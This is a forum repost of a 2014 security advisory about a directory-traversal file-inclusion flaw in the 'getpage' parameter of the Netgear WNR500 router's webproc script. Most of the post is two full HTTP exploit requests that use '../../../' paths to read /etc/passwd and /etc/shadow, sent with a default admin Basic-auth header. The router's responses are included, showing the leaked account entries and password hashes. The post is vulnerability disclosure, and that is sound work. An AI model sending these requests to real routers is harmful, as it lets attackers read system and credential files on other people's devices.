Aerosol Posted November 23, 2014 Report Posted November 23, 2014 Netgear Wireless Router WNR500 Parameter Traversal Arbitrary File Access ExploitVendor: NETGEARProduct web page: http://www.netgear.comAffected version: WNR500 (firmware: 1.0.7.2)Summary: The NETGEAR compact N150 classic wireless router (WNR500) improvesyour legacy Wireless-G network. It is a simple, secure way to share yourInternet connection and allows you to easily surf the Internet, use email,and have online chats. The quick, CD-less setup can be done through a webbrowser. The small, efficient design fits perfectly into your home.Desc: The router suffers from an authenticated file inclusion vulnerability(LFI) when input passed thru the 'getpage' parameter to 'webproc' script isnot properly verified before being used to include files. This can be exploitedto include files from local resources with directory traversal attacks.Tested on: mini_httpd/1.19 19dec2003Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscienceAdvisory ID: ZSL-2014-5208Advisory URL: [url]http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5208.php[/url]16.11.2014--= 1 =============================================================GET /cgi-bin/webproc?getpage=../../../etc/passwd&var:menu=advanced&var:page=null HTTP/1.1Host: 192.168.1.1:8080User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCookie: sessionid=7dc3268b; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; sessionid=7dc3268b; auth=ok; expires=Mon, 31-Jan-2050 16:00:00 GMT; language=en_usAuthorization: Basic YWRtaW46cGFzc3dvcmQ=Connection: keep-alive---HTTP/1.0 200 OKContent-type: text/htmlCache-Control: no-cacheset-cookie: sessionid=7dc3268b;set-cookie: auth=ok;set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT;#root:x:0:0:root:/root:/bin/bashroot:x:0:0:root:/root:/bin/sh#tw:x:504:504::/home/tw:/bin/bash#tw:x:504:504::/home/tw:/bin/msh= 2 =============================================================GET /cgi-bin/webproc?getpage=../../../etc/shadow&var:menu=advanced&var:page=null HTTP/1.1Host: 192.168.1.1:8080User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCookie: sessionid=7dc3268b; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; sessionid=7dc3268b; auth=ok; expires=Mon, 31-Jan-2050 16:00:00 GMT; language=en_usAuthorization: Basic YWRtaW46cGFzc3dvcmQ=Connection: keep-alive---HTTP/1.0 200 OKContent-type: text/htmlCache-Control: no-cacheset-cookie: sessionid=7dc3268b;set-cookie: auth=ok;set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT;#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::Source Quote